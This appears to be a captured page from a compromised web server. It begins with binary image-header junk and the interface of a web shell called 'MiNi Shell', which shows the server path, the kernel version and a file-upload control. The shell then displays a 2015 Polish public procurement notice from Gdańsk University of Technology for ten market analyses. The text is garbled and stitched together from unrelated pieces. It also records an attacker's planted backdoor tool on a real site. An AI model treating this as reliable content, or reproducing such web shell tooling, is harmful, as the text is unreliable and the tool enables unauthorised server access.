JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150204/25292-N-2015.html

<p class="kh_header"><b>Gdańsk: usługa przeprowadzenia 10 analiz dotyczących potrzeb rynku  służących wyborowi tematyki badań B+R w Politechnice Gdańskiej w związku z realizacją projektu  Inkubator innowacyjności współfinansowanego ze środków finansowych na naukę w ramach projektu systemowego Wsparcie systemu zarządzania badaniami naukowymi oraz ich wynikami, realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 realizowanego przez Centrum Transferu Wiedzy i Technologii Politechniki Gdańskiej</b><br>
<b>Numer ogłoszenia: 25292 - 2015; data zamieszczenia: 04.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Dział Zamówień Publicznych , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 347 24 00, faks +48 58 347 29 13.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa przeprowadzenia 10 analiz dotyczących potrzeb rynku  służących wyborowi tematyki badań B+R w Politechnice Gdańskiej w związku z realizacją projektu  Inkubator innowacyjności współfinansowanego ze środków finansowych na naukę w ramach projektu systemowego Wsparcie systemu zarządzania badaniami naukowymi oraz ich wynikami, realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 realizowanego przez Centrum Transferu Wiedzy i Technologii Politechniki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa przeprowadzenia 10 analiz dotyczących potrzeb rynku  służących wyborowi tematyki badań B+R w Politechnice Gdańskiej w związku z realizacją projektu  Inkubator innowacyjności współfinansowanego ze środków finansowych na naukę 
w ramach projektu systemowego Wsparcie systemu zarządzania badaniami naukowymi oraz ich wynikami, realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 realizowanego przez Centrum Transferu Wiedzy i Technologii Politechniki Gdańskiej.
2.Dziedziny nauki, w których zostaną wykonane analizy: architektura, chemia, elektronika, telekomunikacja, informatyka, elektrotechnika, automatyka, fizyka, matematyka, inżynieria lądowa, środowisko, mechanika, oceanotechnika, okrętownictwo, zarządzanie, ekonomia.
3.Zamawiający zastrzega sobie prawo do niezrealizowania 40 % przedmiotu umowy 
w całości, a Wykonawcy w takim wypadku nie będzie przysługiwać żadne roszczenie z tego tytułu.
4.Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji obejmującej zwiększenie przedmiotu zamówienia do 20% zamówienia podstawowego, tj.  zwiększenie usługi o wykonanie dodatkowo 2 analiz.
5.Ilości w prawie opcji są ilościami przewidywanymi. Zamawiający może z nich skorzystać, lecz nie musi. 
6.Cena jednostkowa dla prawa opcji jest taka sama jak cena dla zamówienia podstawowego. Zamówienie objęte prawem opcji będzie realizowane w takich samych terminach, 
jak zamówienie podstawowe.
7.Wykonawca w ramach realizacji przedmiotu zamówienia przygotuje pisemny raport zawierający analizę potrzeb rynku w ilości 2 egzemplarzy dla każdej analizy. 
8.Etapy analizy:
1)Etap 1: Technologie
Zapoznanie się z tematyką prowadzonych przez Twórcę badań naukowych.
Rozpoznanie aktualnego stanu wiedzy i zainteresowań naukowych Twórcy.
Rozpoznanie dostępnego dla Twórcy sprzętu laboratoryjnego.
Rozpoznanie możliwości skompletowania przez Twórcę zespołu badawczego.
Rozpoznanie dostępnych obecnie technologii w dziedzinie potencjału badawczego Twórcy.
Wymagane co najmniej 1 spotkanie Wykonawcy z Twórcą. Miejsce spotkania: Politechnika Gdańska.
2).Etap 2: Zastosowania rynkowe
Dotyczy technologii rozpoznanych w Etapie 1
Rozpoznanie aktualnych i prognoza przyszłych potrzeb rynku (Polska, Europa, USA, Indie, Chiny).
Wyszukanie grup użytkowników końcowych (Polska, Europa, USA, Indie, Chiny).
Wyszukanie producentów (Polska, Europa, USA, Indie, Chiny).
3). Etap 3: Aspekty wdrożeniowe
Dotyczy zagadnień rozpoznanych w Etapie 1 i Etapie 2.
Rozpoznanie możliwych modeli komercjalizacji.
Rozpoznanie dostępnych dla Twórcy modeli biznesowych.
Rozpoznanie praw własności intelektualnej (patentów, zgłoszeń patentowych, wzorów użytkowych).
Rozpoznanie orientacyjnych kosztów doprowadzenia do wykonania prototypu oraz orientacyjnych kosztów produkcji wielkoseryjnej.
Rozpoznanie dostępnych obecnie i w przyszłości sposobów finansowania badań, programów i projektów NCBiR, NCN itp.
Wymagane co najmniej 1 spotkanie Wykonawcy z Twórcą. Miejsce spotkania: Politechnika Gdańska.
4).Etap 4: Rozpoznanie wzajemnych zależności
Dotyczy zagadnień rozpoznanych w Etapie 1, Etapie 2 i Etapie 3.
Rozpoznanie wzajemnego wpływu technologii, zastosowań rynkowych i aspektów wdrożeniowych na wybór tematyki badań naukowych.
Zawężanie zagadnień rozpoznanych w każdym z etapów.
Bezpośrednie kontakty z potencjalnymi użytkownikami i partnerami biznesowymi.
Wymagane co najmniej 1 spotkanie Wykonawcy z Twórcą. Miejsce spotkania: Politechnika Gdańska.
5). Etap 5: Rekomendacja
Wskazanie wraz z uzasadnieniem konkretnych technologii dla konkretnych zastosowań rynkowych dla konkretnych aspektów wdrożeniowych, dających największą szansę na komercjalizację.
Wskazanie wraz z uzasadnieniem tematyki badań naukowych, przy uwzględnieniu wzajemnych zależności wskazanych technologii, zastosowań rynkowych i aspektów wdrożeniowych.
Wskazanie wraz z uzasadnieniem potencjalnych partnerów do rozwoju wskazanej tematyki badań.
Podanie danych sprzedażowych w Polsce i UE w okresie 01.01.2011 r. - 31.12.2013 r. dla wybranych technologii, ze wskazaniem źródła danych.
Analiza konkurencji wskazanych technologii.
Analiza SWOT i analiza ryzyka wskazanej tematyki badań.
9.Wykonawca jest zobowiązany do udzielania niezbędnych informacji i pomocy potrzebnej 
do zrozumienia i wyjaśnienia niejasności we wszystkich sprawach będących przedmiotem zamówienia. 
10.Wykonawca oświadcza, że posiada niezbędną wiedzę, kwalifikacje i umiejętności konieczne 
do prawidłowego wykonania przedmiotu zamówienia.
11.Wykonawca oświadcza, że przedmiot zamówienia zostanie wykonany z najwyższą starannością, zgodnie z ogłoszeniem o udzielaniu zamówienia i wytycznymi ze strony Zamawiającego, wynikającą z zawodowego charakteru jego działalności i w sposób gwarantujący pełne i prawidłowe zabezpieczenie interesów Zamawiającego.
12.Wykonany przez Wykonawcę przedmiot zamówienia będzie wolny od wad prawnych, 
w szczególności praw osób trzecich związanych z prawami autorskimi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem przystąpienia do przetargu jest wniesienie przed upływem terminu składania ofert wadium.
2.Wysokość wadium ustalono na kwotę 7 500 zł.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)pieniądzu,
- przelewem na rachunek bankowy Zamawiającego 
Bank Millennium S.A.
64 1160 2202 0000 0001 8607 3782
z dopiskiem: Wadium Nr postępowania ZP/29/057/U/15.
Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, 
że otrzymał taki przelew przed upływem terminu składania ofert, tj. do dnia 12.02.2015 r. 
do godz. 09:30. Kopię przelewu należy dołączyć do oferty;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy 
z dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(Dz.U. z   2007 r., poz. 275, z późn. zm.).
4.W przypadku wnoszenia wadium w jednej z form określonych w pkt. 2 ppkt. 2 ÷ 5, oryginał dokumentu wadium należy złożyć za pokwitowaniem w kasie Kwestury Politechniki Gdańskiej (Gmach B) lub przesłać pocztą (Kwestura Politechniki Gdańskiej, ul. Narutowicza 11/12, 80-233 Gdańsk z dopiskiem Wadium do ZP/29/057/U/15), natomiast potwierdzoną 
za zgodność z oryginałem kserokopię dokumentu dołączyć do oferty.
5.Wadium wniesione w jednej z form określonych w pkt 2 ppkt 2 ÷ 5, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy najpóźniej w terminie składania ofert, tj. do dnia 12.02.2015 r. do godz. 09:30  Zamawiający otrzyma stosowny dokument.
6.Dokument wadialny (poręczenie lub gwarancja) musi być sporządzony zgodnie z obowiązującym prawem i zawierać następujące elementy:
1)nazwę oraz wskazanie siedziby: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego) oraz Wykonawcy/poręczyciela (banku; instytucji ubezpieczeniowej lub podmiotu poręczającego),
2)określenie postępowania o udzielenie zamówienia publicznego, którego dotyczy,
3)kwotę,
4)termin ważności,
5)mieć formę bezwarunkowego, płatnego na pierwsze pisemne żądanie Zamawiającego, 
6)być nieodwołalny,
7)obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.
8)a także obejmować cały okres związania ofertą, określony w SIWZ.
7.Nie wniesienie wadium w wymaganym terminie, w wymaganej wysokości lub w wymaganej formie na cały okres związania ofertą, skutkuje wykluczeniem Wykonawcy z postępowania.
8.Zgodnie z art. 46 ust. 4a ustawy Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art.. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
9.Zgodnie z art. 46 ust. 5 ustawy Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
9.Zamawiający, z zastrzeżeniem pkt. 7 i 8 niezwłocznie zwróci Wykonawcom wniesione wadia, zgodnie z art. 46 ust. 1 ÷ 4 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy - w tym okresie  usługę przeprowadzenia 1 analizy dotyczącej potrzeb rynku służących wyborowi tematyki badań B+R.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy sporządzony wg załącznika 1 do SIWZ 2.Opcjonalnie, jeśli występuje pełnomocnik, pełnomocnictwo dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną 3. Opcjonalnie zobowiązanie do oddania Zamawiającemu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia 4. Kopię potwierdzenia wniesienia wadium 5. Formularz rzeczowo-cenowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - termin wykonania zamówienia - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wcześniejszego zakończenia przedmiotu zamówienia 
w przypadku:
1). wykonania i dostarczenia przez Wykonawcę bez zastrzeżeń 10 analiz przed terminem 30.08.2015 r.,
2). wykonania i dostarczenia przez Wykonawcę bez zastrzeżeń dodatkowych 
2 analiz w ramach prawa opcji przed terminem 30.08.2015 r.,
3). niezrealizowania przez Zamawiającego 40% przedmiotu umowy,
2. Zgodnie z art. 144 ust 1 ustawy Pzp Zamawiający dopuszcza możliwość dokonania następującej zmiany umowy w zakresie terminu zakończenia realizacji przedmiotu umowy w przypadku wystąpienia siły wyższej, tj. klęski żywiołowe, huragan, powódź, katastrofy transportowe, pożar, eksplozje, wojna, strajk i inne nadzwyczajne wydarzenia, których zaistnienie leży poza zasięgiem i kontrolą stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.dzp.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska, Centrum Transferu Wiedzy i Technologii, Biuro Inkubatora Innowacyjności Dom Studencki Nr 12 ul. Traugutta 115 A, 80-226 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2015 godzina 09:30, miejsce: Politechnika Gdańska, Centrum Transferu Wiedzy i Technologii, Biuro Inkubatora Innowacyjności Dom Studencki Nr 12 ul. Traugutta 115 A, 80-226 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie finansowane jest w ramach realizacji projektu Inkubator Innowacyjności współfinansowanego ze środków finansowych na naukę w ramach projektu systemowego Wsparcie systemu zarządzania badaniami naukowymi oraz ich wynikami, realizowanego w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 (Poddziałanie 1.1.3) realizowanego w Centrum Transferu Wiedzy i Technologii.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com